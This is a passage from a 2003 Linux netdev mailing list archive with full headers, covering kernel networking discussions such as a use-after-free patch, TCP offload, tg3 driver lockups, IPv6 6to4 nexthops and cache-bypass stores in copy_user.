Most of the time, that data remains cached, so I > don't think we'd want to use non-temporal stores on those (in > general). csum_and_copy_from_user() isn't well optimized yet. Let's > see if I can find a volunteer... ;-) No, I mean "bypass L2 cache on miss" for stores. Don't tell me IA64 doesn't have that? 8) I certainly didn't mean "always bypass L2 cache" for stores :-) From hadi@cyberus.ca Tue Jul 15 19:19:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 19:19:55 -0700 (PDT) Received: from mail.cyberus.ca (mail.cyberus.ca [209.195.118.111]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G2JjFl029147 for ; Tue, 15 Jul 2003 19:19:45 -0700 Received: from cpe0030ab124d2f-cm014500000962.cpe.net.cable.rogers.com ([24.103.99.32] helo=[10.0.0.9]) by mail.cyberus.ca with esmtp (Exim 4.12) id 19cbtQ-000JqD-00; Tue, 15 Jul 2003 22:19:44 -0400 Subject: Re: route-cache status? From: jamal Reply-To: hadi@cyberus.ca To: alex@pilosoft.com Cc: netdev@oss.sgi.com In-Reply-To: References: Content-Type: text/plain Organization: jamalopolis Message-Id: <1058336353.1899.41.camel@jzny.localdomain> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 Date: 16 Jul 2003 02:19:13 -0400 Content-Transfer-Encoding: 7bit X-archive-position: 4083 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev Not sure if anybody responded to you; if you are on 2.4.x those patches seem to have made it into the latest pre 2.4.22 off kernel.org. Just grab those. cheers, jamal On Mon, 2003-07-07 at 13:03, alex@pilosoft.com wrote: > Hello, > > i've been following discussions a few weeks ago regarding developments of > route cache, and am trying to develop conclusion of the current best code > base. > > >From list, it seems that 2.4.20 is still better than 2.5.70+davem patches > or 2.4.21. > > Am I correct? Are there any newer patches available? 
> > -alex > > > > From davem@redhat.com Tue Jul 15 19:26:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 19:26:43 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G2QaFl029607 for ; Tue, 15 Jul 2003 19:26:37 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id TAA15519; Tue, 15 Jul 2003 19:17:09 -0700 Date: Tue, 15 Jul 2003 19:17:09 -0700 From: "David S. Miller" To: Julian Anastasov Cc: netdev@oss.sgi.com Subject: Re: [patches] invalid nh.raw use after free Message-Id: <20030715191709.1e0c6427.davem@redhat.com> In-Reply-To: References: X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4084 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 02:41:00 +0300 (EEST) Julian Anastasov wrote: > The attached patches fix similar bug to many places (I'm not > sure if there are more instances), where pointers remain to refer to > freed skbs. For 2.5 and 2.4. Good catch, I'll apply this. Thanks. 
From mmporter@cox.net Tue Jul 15 19:38:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 19:38:17 -0700 (PDT) Received: from fed1mtao01.cox.net (fed1mtao01.cox.net [68.6.19.244]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G2c5Fl030201 for ; Tue, 15 Jul 2003 19:38:06 -0700 Received: from liberty.homelinux.org ([68.2.43.114]) by fed1mtao01.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20030716023758.WVLP7643.fed1mtao01.cox.net@liberty.homelinux.org>; Tue, 15 Jul 2003 22:37:58 -0400 Received: (from mmporter@localhost) by liberty.homelinux.org (8.9.3/8.9.3/Debian 8.9.3-21) id TAA10307; Tue, 15 Jul 2003 19:37:58 -0700 Date: Tue, 15 Jul 2003 19:37:58 -0700 From: Matt Porter To: "David S. Miller" Cc: Alan Shih , linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-ID: <20030715193758.C8616@home.com> References: <20030713004818.4f1895be.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20030713004818.4f1895be.davem@redhat.com>; from davem@redhat.com on Sun, Jul 13, 2003 at 12:48:18AM -0700 X-archive-position: 4085 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mporter@kernel.crashing.org Precedence: bulk X-list: netdev On Sun, Jul 13, 2003 at 12:48:18AM -0700, David S. Miller wrote: > On receive side, clever RX buffer flipping tricks are the way > to go and require no protocol changes and nothing gross like > TOE or weird buffer ownership protocols like RDMA requires. > > I've made postings showing how such a scheme can work using a limited > flow cache on the networking card. I don't have a reference handy, > but I suppose someone else does. 
The following reference should be useful for those following along at home and wondering what the hell this hardware flow cache scheme is: http://www.ussg.iu.edu/hypermail/linux/kernel/0306.2/0429.html Regards, -- Matt Porter mporter@kernel.crashing.org From mmporter@cox.net Tue Jul 15 19:46:56 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 19:47:00 -0700 (PDT) Received: from fed1mtao02.cox.net (fed1mtao02.cox.net [68.6.19.243]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G2ktFl031077 for ; Tue, 15 Jul 2003 19:46:55 -0700 Received: from liberty.homelinux.org ([68.2.43.114]) by fed1mtao02.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20030716024649.XOUR24536.fed1mtao02.cox.net@liberty.homelinux.org>; Tue, 15 Jul 2003 22:46:49 -0400 Received: (from mmporter@localhost) by liberty.homelinux.org (8.9.3/8.9.3/Debian 8.9.3-21) id TAA10355; Tue, 15 Jul 2003 19:46:49 -0700 Date: Tue, 15 Jul 2003 19:46:49 -0700 From: Matt Porter To: "David S. 
Miller" Cc: Valdis.Kletnieks@vt.edu, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: TCP IP Offloading Interface Message-ID: <20030715194649.D8616@home.com> References: <20030713004818.4f1895be.davem@redhat.com> <52u19qwg53.fsf@topspin.com> <20030713160200.571716cf.davem@redhat.com> <20030713233503.GA31793@work.bitmover.com> <20030713164003.21839eb4.davem@redhat.com> <20030713235424.GB31793@work.bitmover.com> <20030713165323.3fc2601f.davem@redhat.com> <200307140046.h6E0kcMQ021180@turing-police.cc.vt.edu> <20030713174242.3ceb8213.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20030713174242.3ceb8213.davem@redhat.com>; from davem@redhat.com on Sun, Jul 13, 2003 at 05:42:42PM -0700 X-archive-position: 4086 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mporter@kernel.crashing.org Precedence: bulk X-list: netdev On Sun, Jul 13, 2003 at 05:42:42PM -0700, David S. Miller wrote: > There are cards, both existing and in development, that have > very simple header parsing engines you can program to do stuff > like this, it isn't hard at all. Do you have a reference to an existing card that implements a header parsing engine like this (and has obtainable docs)? 
Regards, -- Matt Porter mporter@kernel.crashing.org From pakrat@www.linux.org.uk Tue Jul 15 20:52:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 20:52:58 -0700 (PDT) Received: from www.linux.org.uk (IDENT:rwCGhAyYAIdsaD//UFnmshH1hGqE76nc@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G3qmFl032195 for ; Tue, 15 Jul 2003 20:52:49 -0700 Received: from pakrat by www.linux.org.uk with local (Exim 4.14) id 19cVbT-0005j2-An; Tue, 15 Jul 2003 20:36:47 +0100 Date: Tue, 15 Jul 2003 20:36:47 +0100 From: Chris Dukes To: ralph+d@istop.com Cc: Jordi Ros , "netdev@oss.sgi.com" Subject: Re: TCP IP Offloading Interface Message-ID: <20030715193647.GQ2686@parcelfarce.linux.theplanet.co.uk> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4.1i X-archive-position: 4087 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pakrat@www.uk.linux.org Precedence: bulk X-list: netdev On Tue, Jul 15, 2003 at 03:01:11PM -0400, Ralph Doncaster wrote: > On Mon, 14 Jul 2003, Jordi Ros wrote: > > > Note that Microsoft is considering TOE under its Scalable Networking Program. To keep linux competitive, I would encourage a healthy discussion on this matter. Again, TOE is not the goal but the means to deliver important technologies for the next generation of servers. This will be critical as the backbone of the Internet goes to all optical networks while the servers stay at the electronic domain. As shown by McKeown, "Circuit Switching in the Core", the line capacity of the optical fibers is doubling every 7 months while the processing CPU capacity (Moore's law) can only double every 18 months. > > Moore's law is borne out in practice; most optical transmission > developments are theory.
3 years ago the fastest circuit you could > readily buy from a carrier (QWest, 360, Williams, etc) was OC192. Today I > still can't contact a rep from any of those companies and order an OC768. The above ignores the economics of the matter. The money in optical carriers is currently in datacomm, not telecomm. You'll see the highspeed optics in your server room before you see it at your telco. Companies that work with datacomm optical carriers are facing budget limits with respect to software required for in house development of hybrid ICs for highspeed datacom and compute resources for simulating the highspeed analogue circuits required for optical datacom. The theoretical switching speed is useless when the engineers are back to designing digital circuits transistor by transistor and cannot verify that all the circuits synchronize at those speeds. -- Chris Dukes I tried being reasonable once--I didn't like it. From davem@redhat.com Tue Jul 15 21:52:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 21:53:07 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G4qvFl000780 for ; Tue, 15 Jul 2003 21:52:58 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA15768; Tue, 15 Jul 2003 21:43:33 -0700 Date: Tue, 15 Jul 2003 21:43:32 -0700 From: "David S. 
Miller" To: Stephen Hemminger Cc: netdev@oss.sgi.com Subject: Re: [PATCH] dynamic net_device for serial eql balancer Message-Id: <20030715214332.4a33db6d.davem@redhat.com> In-Reply-To: <20030715155733.0ee5a14d.shemminger@osdl.org> References: <20030715155733.0ee5a14d.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4088 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 15:57:33 -0700 Stephen Hemminger wrote: > Patch against 2.6.0-test1 to dynamically allocate pseudo network device. > Compiles and loaded/unloaded but don't have multi-port serial load balancing to test > more fully. Applied, thanks Stephen. From davem@redhat.com Tue Jul 15 22:02:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 22:02:45 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G52dFl001234 for ; Tue, 15 Jul 2003 22:02:39 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA15798; Tue, 15 Jul 2003 21:53:00 -0700 Date: Tue, 15 Jul 2003 21:53:00 -0700 From: "David S.
Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][ATM] some misc sk-related fixups for atm Message-Id: <20030715215300.1927dbac.davem@redhat.com> In-Reply-To: <200307151254.h6FCshsG028747@ginger.cmf.nrl.navy.mil> References: <200307151254.h6FCshsG028747@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4089 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 08:52:15 -0400 chas williams wrote: > this set does away with a few redundant bits in the struct atm_vcc, > in particular .reply and .svc_callback. WAITING becomes a flag > instead of overloading sk_err. it also changes the wake_up's to > the appropriate sk event. Looks good, applied. Thanks Chas. From greearb@candelatech.com Tue Jul 15 22:07:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 22:07:54 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G57lFl001623 for ; Tue, 15 Jul 2003 22:07:48 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6G57eKk013055 for ; Tue, 15 Jul 2003 22:07:42 -0700 Message-ID: <3F14DD9C.9090807@candelatech.com> Date: Tue, 15 Jul 2003 22:07:40 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "'netdev@oss.sgi.com'" Subject: tg3 and machine lockup? 
Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4090 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev I was running 2500 pps tx+rx on a 100bt port, with a tg3 in the same machine. 1000 tcp connections, memory pressure, and cpu was max'ed out. I plugged in the tg3 to a e1000 (via cross-over cable), and then, or very soon after that, the machine hung solid (or, maybe it tried to spew to console..was on kvm and not selected..) Last thing I see in the /var/log/messages is tg3 saying flow control is on for tx and rx. Now, it could be one of a million things...but just curious if anyone else has seen anything like this. Kernel is 2.4.20 + my hacks. Take it easy, Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From davem@redhat.com Tue Jul 15 22:17:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 22:17:49 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G5HYFl002094 for ; Tue, 15 Jul 2003 22:17:39 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA15850; Tue, 15 Jul 2003 22:08:10 -0700 Date: Tue, 15 Jul 2003 22:08:10 -0700 From: "David S. Miller" To: Ben Greear Cc: netdev@oss.sgi.com Subject: Re: tg3 and machine lockup? 
Message-Id: <20030715220810.24bf073f.davem@redhat.com> In-Reply-To: <3F14DD9C.9090807@candelatech.com> References: <3F14DD9C.9090807@candelatech.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4091 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 22:07:40 -0700 Ben Greear wrote: > Now, it could be one of a million things...but just curious if anyone > else has seen anything like this. Kernel is 2.4.20 + my hacks. There were tons of locking fixes to the tg3 driver in 2.4.21 From pekkas@netcore.fi Tue Jul 15 23:04:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 23:04:23 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G64CFl004279 for ; Tue, 15 Jul 2003 23:04:16 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6G63vh20151; Wed, 16 Jul 2003 09:03:57 +0300 Date: Wed, 16 Jul 2003 09:03:57 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: davem@redhat.com, Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <200307152319.DAA09683@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4092 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > Assume you're a host on a link with prefix 3FFE:FFFF:A:B::/64. The router > > is the one with interface ID one. > > Not going to work. Host autoconfiguration conventions have nothing > to do with real addressing. 
Proceeding in this way you will denounce > neighbour discovery, what the hell to do this when hw address can be recovered > from EUI64 token? :-) Did you miss the word "Assume" ? > > What happens when you do "ping6 3FFE:FFFF:A:B::1" ? > > Hey, you have lost track, rewind several mails ago. Nope. I'm just pointing out the general concept. > Of course, ping and > any other protocols will work, how can it not work? :-) It has been shown to work on other platforms, so why not Linux? -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From pekkas@netcore.fi Tue Jul 15 23:12:20 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 23:12:29 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G6CIFl004854 for ; Tue, 15 Jul 2003 23:12:19 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6G6C5v20245; Wed, 16 Jul 2003 09:12:05 +0300 Date: Wed, 16 Jul 2003 09:12:04 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: davem@redhat.com, , Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT In-Reply-To: <200307152332.DAA09710@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4093 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > Such addresses are link-locals, of link local scope only. A link-local > > IPv6 address is awfully difficult to remember and type for all of your > > possible links. > > > > The only reasonable value user could supply is a global address. > > So what? I do not see connection to previous. You want to live with global > addresses as nexthop? Yes, I dare to say that they're a requirement.
(But to be clear, when I talk about "global nexthop", I'm only interested in nexthops which are on-link. That is, if you have prefix 3FFE:FFFF:A:B::/64, setting 3FFE:FFFF:A:B::1 would be ok, but 3FFE:FFFF:F00:BA::1 would not *have* to work.) > OK. But I remember you have spoken something quite > opposite yesterday. I don't recall that. I think I was only suggesting that ONE possible way of implementing it (which I wouldn't think is the best one) is to make that the user space tools' problem: i.e. make them resolve a globally addressed nexthop to a link-local nexthop. > > Redundant information can be ignored. This is not computer science > > theory, removing everything which is not directly relevant. The use of > > the same representation for the next-hop (2002:F00:BA::x) as an address > > (2002:BA:F00:y) is the only logical, user-friendly way. > > What a bullshit... The second is address of host "x". The first is supposed > to be address of host F00:BA, whatever it is. Probably, you can decrypt > this only because poisoned by computer science. :-) You read too much into what I wrote (or maybe I wrote too much :-) -- what I mean is that 6to4 addresses have a very specific format. It's completely illogical and unfriendly to the users to require the use of different formats when they use 6to4 addresses as nexthops and "normal" addresses. > Just to complete discussion, let's stay on format fe80::A.B.C.D, for example. > Unlike anothers it is 100% logically clean. :-) I can't disagree with you there; it's simple, but it's NOT what specifications use and the *users* want and need to use. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R.
Martin: A Clash of Kings From davidm@napali.hpl.hp.com Tue Jul 15 23:32:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 23:32:56 -0700 (PDT) Received: from palrel11.hp.com (palrel11.hp.com [156.153.255.246]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G6WpFl005364 for ; Tue, 15 Jul 2003 23:32:51 -0700 Received: from hplms2.hpl.hp.com (hplms2.hpl.hp.com [15.0.152.33]) by palrel11.hp.com (Postfix) with ESMTP id A5F771C02401; Tue, 15 Jul 2003 23:32:50 -0700 (PDT) Received: from napali.hpl.hp.com (napali.hpl.hp.com [15.4.89.123]) by hplms2.hpl.hp.com (8.12.9/8.12.9/HPL-PA Hub) with ESMTP id h6G6WnJT020030; Tue, 15 Jul 2003 23:32:50 -0700 (PDT) Received: from napali.hpl.hp.com (localhost [127.0.0.1]) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) with ESMTP id h6G6WnrK006803; Tue, 15 Jul 2003 23:32:49 -0700 Received: (from davidm@localhost) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) id h6G6WmIq006799; Tue, 15 Jul 2003 23:32:48 -0700 From: David Mosberger MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <16148.61840.663255.863176@napali.hpl.hp.com> Date: Tue, 15 Jul 2003 23:32:48 -0700 To: "David S. 
Miller" Cc: davidm@hpl.hp.com, davidm@napali.hpl.hp.com, scott.feldman@intel.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter In-Reply-To: <20030715183911.1c18cc15.davem@redhat.com> References: <20030714214510.17e02a9f.davem@redhat.com> <16147.37268.946613.965075@napali.hpl.hp.com> <20030714223822.23b78f9b.davem@redhat.com> <16148.34787.633496.949441@napali.hpl.hp.com> <20030715183911.1c18cc15.davem@redhat.com> X-Mailer: VM 7.07 under Emacs 21.2.1 Reply-To: davidm@hpl.hp.com X-URL: http://www.hpl.hp.com/personal/David_Mosberger/ X-archive-position: 4094 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davidm@napali.hpl.hp.com Precedence: bulk X-list: netdev >>>>> On Tue, 15 Jul 2003 18:39:11 -0700, "David S. Miller" said: >> We could, but would it always be a win? Especially for >> copy_from_user(). Most of the time, that data remains cached, so >> I don't think we'd want to use non-temporal stores on those (in >> general). csum_and_copy_from_user() isn't well optimized yet. >> Let's see if I can find a volunteer... ;-) DaveM> No, I mean "bypass L2 cache on miss" for stores. Don't tell DaveM> me IA64 doesn't have that? 8) I certainly didn't mean "always DaveM> bypass L2 cache" for stores :-) What I'm saying is that I almost always want copy_user() to put the destination data in the cache, even if it isn't cached yet. Many copy_user() calls are for data structures that easily fit in the cache and the data is usually used quickly afterwards. As for cache-hints supported by IA64: the architecture supports various non-temporal hints (non-temporal in 1st, 2nd, or all cache-levels). How these hints are implemented depends on the chip. On McKinley, non-temporal hints are generally implemented by storing the data in the cache without updating the LRU info. So if the data is already there, it will stay cached (until a victim is needed).
--david From davem@redhat.com Tue Jul 15 23:41:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 23:41:08 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G6f3Fl005746 for ; Tue, 15 Jul 2003 23:41:04 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id XAA16042; Tue, 15 Jul 2003 23:30:35 -0700 Date: Tue, 15 Jul 2003 23:30:34 -0700 From: "David S. Miller" To: davidm@hpl.hp.com Cc: davidm@napali.hpl.hp.com, scott.feldman@intel.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter Message-Id: <20030715233034.31bf0709.davem@redhat.com> In-Reply-To: <16148.61840.663255.863176@napali.hpl.hp.com> References: <20030714214510.17e02a9f.davem@redhat.com> <16147.37268.946613.965075@napali.hpl.hp.com> <20030714223822.23b78f9b.davem@redhat.com> <16148.34787.633496.949441@napali.hpl.hp.com> <20030715183911.1c18cc15.davem@redhat.com> <16148.61840.663255.863176@napali.hpl.hp.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4095 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 23:32:48 -0700 David Mosberger wrote: > DaveM> No, I mean "bypass L2 cache on miss" for stores. Don't tell > DaveM> me IA64 doesn't have that? 8) I certainly didn't mean "always > DaveM> bypass L2 cache" for stores :-) > > What I'm saying is that I almost always want copy_user() to put the > destination data in the cache, even if it isn't cached yet. No you don't :-) If you miss, you do a bypass to main memory. 
Then when the app asks for the data (if it even does at all, consider that) it gets a clean copy in its L2 cache. Overall it's more efficient this way. > Many copy_user() calls are for data structures that > easily fit in the cache and the data is usually used quickly afterwards. Absolutely correct. We can't use the cache bypass-on-miss stores on sparc64 unless the copy is at least a couple of cachelines in size. It all works out, don't worry :-) From greearb@candelatech.com Wed Jul 16 00:04:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 00:04:53 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G74lFl006378 for ; Wed, 16 Jul 2003 00:04:47 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6G74fKk029607; Wed, 16 Jul 2003 00:04:41 -0700 Message-ID: <3F14F909.3070009@candelatech.com> Date: Wed, 16 Jul 2003 00:04:41 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: netdev@oss.sgi.com Subject: Re: tg3 and machine lockup? References: <3F14DD9C.9090807@candelatech.com> <20030715220810.24bf073f.davem@redhat.com> In-Reply-To: <20030715220810.24bf073f.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4096 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev David S. Miller wrote: > On Tue, 15 Jul 2003 22:07:40 -0700 > Ben Greear wrote: > > >>Now, it could be one of a million things...but just curious if anyone >>else has seen anything like this. Kernel is 2.4.20 + my hacks.
> > > There were tons of locking fixes to the tg3 driver > in 2.4.21 > Cool, just moving to that now. Will let you know how it goes. Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From ja@ssi.bg Wed Jul 16 00:09:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 00:09:42 -0700 (PDT) Received: from l.himel.bg (IDENT:root@unamed.infotel.bg [212.39.68.18] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G79VFl006788 for ; Wed, 16 Jul 2003 00:09:33 -0700 Received: from linux.himel.bg (IDENT:ja@linux.himel.bg [127.0.0.1]) by l.himel.bg (8.11.6/8.9.3) with ESMTP id h6G792L02153; Wed, 16 Jul 2003 10:09:02 +0300 Date: Wed, 16 Jul 2003 10:09:02 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@l To: "David S. Miller" cc: netdev@oss.sgi.com Subject: Re: [patches] invalid nh.raw use after free In-Reply-To: <20030715191709.1e0c6427.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4097 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Tue, 15 Jul 2003, David S. Miller wrote: > > sure if there are more instances), where pointers remain to refer to > > freed skbs. For 2.5 and 2.4. > > Good catch, I'll apply this. 
